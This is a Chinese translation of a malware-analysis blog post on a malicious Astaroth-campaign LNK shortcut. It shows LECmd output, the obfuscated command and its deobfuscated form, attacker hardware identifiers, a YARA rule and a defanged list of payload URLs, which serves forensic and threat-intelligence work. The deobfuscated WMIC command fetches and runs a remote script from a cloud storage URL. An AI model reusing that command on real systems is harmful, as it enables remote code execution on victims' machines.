恶意LNK（快捷方式）文件常常是电子调查取证的重点。从攻击者的角度来说，一个很小容量的文件既可直接进行各种攻击，又可引入其他恶意软件；从防御者的角度来说，其内含的信息对于攻击后溯源分析有很大的用处。对于攻击者制造恶意LNK文件，MITRE ATT&CK框架将其描述为“shortcut modification”(T1023)，总结如下:

快捷方式是一种引用其他文件或程序的通用方法，在系统启动或用户单击它时，就会打开或执行其他文件。攻击者可以通过快捷方式部署他们的持久性攻击工具。他们可能会创建一个新的快捷方式关联到某个恶意软件，同时把它伪装成一个合法的程序。或者攻击者也可以编辑已存在快捷方式的目标路径，这样受害者就会在不知不觉中运行恶意软件。

在2019年7月8日，微软发布的一篇博客文章，详细描述了一场名为Astaroth的恶意软件攻击活动。在这篇文章中我将就这场活动中名为certidao.htm.lnk的恶意LNK文件做一次分析，看看能从其中得到什么有用信息。你可以从Hybrid-Analysis看到它的有关信息。(SHA256: 82942e3356e6d3017e4952491d2a6d8ce5748cfd15387b5bcaaf45a3cb6cf35a)

首先我们看一下文件属性：

从上可以看出，其中“Target”(通常是文件引用)是一段代码，一旦点击快捷方式，代码就会运行。此外，“Comment”看起来像一堆乱码。

接下来，我们使用LECmd提取这个快捷方式的内部信息:

--- Header --- Target created: 2010-11-21 03:24:03 Target modified: 2010-11-21 03:24:03 Target accessed: 2010-11-21 03:24:03 File size: 302,592 Flags: HasTargetIdList, HasLinkInfo, HasName, HasArguments, HasIconLocation, IsUnicode, HasExpString File attributes: FileAttributeArchive Icon index: 64 Show window: SwShowminnoactive (Display the window as minimized without activating it.)Name: zvvvje4d5777hiqt2369aIEFLHKnncxmvbvjhsj2567hgeet286daUFFLHrnccmxbbrh2j2667lguet986ddaUFIHJrnnmmxbihsjj466lgukk980ddWYIIHJrbmcxArguments: /V /C "set x=C77jhd2766:\\77jhd2766W77jhd2766i77jhd2766nd77jhd2766ow77jhd2766s\\s77jhd2766ys77jhd2766te77jhd2766m377jhd2766277jhd2766\\77jhd2766w77jhd2766b77jhd2766e77jhd2766m\\W77jhd2766M77jhd2766I77jhd2766C.e77jhd2766x77jhd2766e o77jhd2766s g77jhd2766e77jhd2766t UF77jhd2766H77jhd2766K77jhd2766m77jhd2766xi77jhd2766h277jhd2766, fre77jhd2766evi77jhd2766r77jhd2766t77jhd2766u77jhd2766a77jhd2766l77jhd2766me77jhd2766mo77jhd2766ry77jhd2766 /77jhd2766fo77jhd2766rm77jhd2766at:"h77jhd2766t77jhd2766t77jhd2766p77jhd2766s77jhd2766:77jhd2766/77jhd2766/st77jhd2766o77jhd2766r77jhd2766ag77jhd2766e.77jhd2766go77jhd2766og77jhd2766lea77jhd2766pis77jhd2766.co77jhd2766m77jhd2766/77jhd2766a77jhd2766w77jhd2766s77jhd2766d77jhd2766x/77jhd27660977jhd2766/v77jhd2766.t77jhd2766xt77jhd2766#0277jhd276650177jhd27664q277jhd2766977jhd2766I77jhd2766S77jhd2766q77jhd2766c77jhd2766z77jhd2766v" &&echo %x:77jhd2766=%|%ComSpec%"Icon Location: %SystemRoot%\system32\imageres.dll--- Link information ---Flags: VolumeIdAndLocalba sePath>>Volume information Drive type: Fixed storage media (Hard drive) Serial number: 086F96AF Label: (No label) Local path: C:\Windows\System32\cmd.exe--- Target ID information (Format: Type ==> Value) --- Absolute path: My Computer\C:\Windows\System32\cmd.exe -Root folder: GUID ==> My Computer -Drive letter ==> C: -Directory ==> WindowsShort name: WindowsModified: 2019-04-30 20:34:24Extension block count: 1--------- Block 0 (Beef0004) ---------Long name: WindowsCreated: 2009-07-14 03:20:10Last access: 2019-04-30 20:34:24MFT entry/sequence #: 671/1 (0x29F/0x1) -Directory ==> System32Short name: System32Modified: 2019-04-30 18:45:08Extension block count: 1--------- Block 0 (Beef0004) ---------Long name: System32Created: 2009-07-14 03:20:12Last access: 2019-04-30 18:45:08MFT entry/sequence #: 2549/1 (0x9F5/0x1) -File ==> cmd.exeShort name: cmd.exeModified: 2010-11-21 03:24:04Extension block count: 1--------- Block 0 (Beef0004) ---------Long name: cmd.exeCreated: 2010-11-21 03:24:04Last access: 2010-11-21 03:24:04MFT entry/sequence #: 20227/1 (0x4F03/0x1)--- End Target ID information ------ Extra blocks information --->> Environment variable data block Environment variables: %ComSpec%>> Special folder data block Special Folder ID: 37>> Known folder data block Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System32>> Property store data block (Format: GUID\ID Description ==> Value) 46588ae2-4cbc-4338-bbfc-139326986dce\4 SID ==> S-1-5-21-81416393-1875007973-1002>> Tracker databa se block Machine ID: dedicado-web MAC Address: 00:26:b9:fd:e1:82 MAC Vendor: DELL Creation: 2019-03-21 04:28:56 Volume Droid: 8c78ff20-8b31-44de-bbba-eabca30a81ea Volume Droid Birth: 8c78ff20-8b31-44de-bbba-eabca30a81ea File Droid: d73dcd41-4b91-11e9-8dc8-0026b9fde182 File Droid birth: d73dcd41-4b91-11e9-8dc8-0026b9fde182

从上面的“海量”输出中，我们可以看到不少有用信息。其中Arguments选项中明显是混淆后的恶意代码，我们把其中的77jhd2766删除，可得到如下命令：

Arguments: /V /C "set x=C:\\Windows\\system32\\wbem\\WMIC.exe os get UFHKmxih2, freevirtualmemory /format:"https://storage.googleapis.com/awsdx/09/v.txt#025014q29ISqczv" &&echo %x:=%|%ComSpec%"

其中利用WMIC.exe去执行存在谷歌服务器上的文件。

硬件信息

除此以上攻击者想要执行的攻击命令，这个LNK文件还包含了攻击者机器的物理信息:

序列号:086F96AF机器ID:dedicado-webMAC地址:00:26:b9:fd:e1:82MAC供应商:DELL

在以上攻击者所使用机器的硬件信息中，除了机器的厂商和MAC地址，还有一个值得关注的NetBios名称dedicado-web。

我们再到谷歌中搜索“dedicado-web”，排除掉无关信息后，我发现了它和巴西地区知名的托管供应商OVH有联系。这也和Astaroth攻击活动主要针对巴西地区这一点相吻合。

其他信息

让我们再把目光转向其他数据。利用LNK文件中其他的数据项，配合我刚学的Yara规则（YARA是一款旨在帮助恶意软件研究人员识别和分类恶意软件样本的开源工具，使用YARA可以基于文本或二进制模式创建恶意软件家族描述信息，当然也可以是其他匹配信息。 ——Freebuf），我可以尝试确定这些“软件标记”是否在以前的恶意软件中出现过。Yara规则如下：

rule Astaroth{ meta: author = "@mattnotmax" date = "2019-07-15" description = "LNK file with a unique MAC address or NETBIOS name in relation to a Astaroth campaign" reference = "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/" sample = "82942e3356e6d3017e4952491d2a6d8ce5748cfd15387b5bcaaf45a3cb6cf35a" strings: $mac = {00 26 B9 FD E1 82} $netbios = "dedicado-web" fullword ascii condition: uint16(0) == 0x4c and ($mac or $netbios)}

通过在Hybrid-Analysis(穷人版VirusTotal)上进行搜索，我找到了22个结果，其中21个共享了样本，上传时间为2019年4月24日至2019年6月11日。

其中一些标记为#banload或#apt，因此可能不相关。让我们再次使用LECmd处理它们，看看最后的结果:

可从上图中看到的，这些恶意文件的构成及其相似，而且其中命令代码混淆方式也几乎一样。我再利用CyberChef（开源数据分析工具），配合正则表达式，对得到的结果进行过滤，从数据中提取相关url:

<{"op":"Fork","args":<"\\n","\\n",true>},{"op":"Register","args":<"(?<=echo %x:)(.*)(?=\\=)",true,false,false>},{"op":"Find / Replace","args":<{"option":"Regex","string":"$R0"},"",true,false,true,false>},{"op":"Find / Replace","args":<{"option":"Simple string","string":"<>"},"",true,false,true,false>},{"op":"Extract URLs","args":},{"op":"Defang URL","args":},{"op":"Remove whitespace","args":}>

结果如下：

hxxp://storage<.>googleapis<.>com/midgoldem/09/v<.>txt#025040xiuj6rl9dhxxp://storage<.>googleapis<.>com/midgoldem/09/v<.>txt#025070xbhj6luk0hxxp://storage<.>googleapis<.>com/xmoabx/04/v<.>txt#025051IJrmxxmirhxxp://e8aUHrmmr<.>intelcore-i1<.>website:25/9/?13825xmuj8lukhxxp://storage<.>googleapis<.>com/midgoldem/06/v<.>txt#025038Knmbj2257hxxps://storage<.>googleapis<.>com/awsdx/09/v<.>txt#025050nmble0aUHhxxps://storage<.>googleapis<.>com/ultramaker/09/v<.>txt#025010bvrhj267lhxxps://storage<.>googleapis<.>com/ultramaker/09/v<.>txt#025060xjuf7hrl3hxxps://storage<.>googleapis<.>com/ultramaker/09/v<.>txt#025060aIUIHKrnchxxp://storage<.>googleapis<.>com/kodesca/08/v<.>txt#025028jd3ISnxvjhxxps://storage<.>googleapis<.>com/awsdx/09/v<.>txt#025014q29ISqczvhxxps://storage<.>googleapis<.>com/ultramaker/08/v<.>txt#025018ef7hil69Ihxxps://storage<.>googleapis<.>com/awsdx/09/v<.>txt#025060jsf7il36hhxxp://storage<.>googleapis<.>com/teslaasth/09/v<.>txt#025050ELKqxmvjdhxxps://storage<.>googleapis<.>com/awsdx/09/v<.>txt#0250800UHbcbrs4hxxp://storage<.>googleapis<.>com/kodesca/09/v<.>txt#025091e6UHrcxvshxxp://q39ESqczv<.>intelcore-i5<.>site:25020/09/?138025020qixvj22hhxxps://storage<.>googleapis<.>com/ultramaker/06/v<.>txt#0250906uk8dWUIJhxxp://storage<.>googleapis<.>com/kodesca/04/v<.>txt#025058il39ELvmdhxxp://storage<.>googleapis<.>com/kodesca/06/v<.>txt#025022e986IJrmchxxp://storage<.>googleapis<.>com/midgoldem/06/v<.>txt#025055rmxvs26ge

结尾

以上所有分析，只是我很短时间内的成果，你可以编写更完善的Yara规则，抓取到更复杂的，更多的恶意软件。此外，我们也可以看到，LNK文件中的多项元数据的也能极大帮助我们定位攻击者。

如果你有任何看法想和我交流，可以通过matt@bitofhex.com联系我。感谢你的阅读!

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场

来源：https://nosec.org/home/detail/2807.html

原文：https://bitofhex.com/2019/07/15/deriving-intelligence-from-lnk-files/

白帽汇从事信息安全，专注于安全大数据、企业威胁情报。

公司产品：FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供：网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。